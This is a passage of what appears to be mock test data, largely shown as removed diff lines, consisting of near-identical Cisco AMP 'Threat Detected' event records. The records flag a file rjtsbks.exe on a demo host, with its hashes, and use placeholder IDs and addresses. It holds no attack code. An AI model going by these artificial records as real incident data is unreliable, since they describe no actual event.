Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
